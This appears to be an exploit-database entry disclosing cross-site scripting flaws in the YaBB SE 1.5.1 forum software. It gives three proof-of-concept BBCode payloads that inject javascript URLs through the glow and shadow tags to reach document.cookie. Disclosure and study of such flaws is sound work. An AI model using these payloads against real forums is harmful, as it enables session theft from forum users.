[] NeoSense

YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities

Author: Cheng Peng Su
type: webapps
platform: php
port: 
date_added: 2004-03-15 
date_updated: 2013-01-02 
verified: 1 
codes: CVE-2004-1827;OSVDB-4283 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/9873/info

It has been reported that YaBB and YaBB SE are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the applications to properly validate URI supplied user input.

Attackers may exploit this vulnerability to steal authentication credentials. Other attacks may also be possible.

[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

The following proof of concept has been supplied by frog-m@n:
[glow=red,2);background:url(javascript:[SCRIPT],300]text[/glow]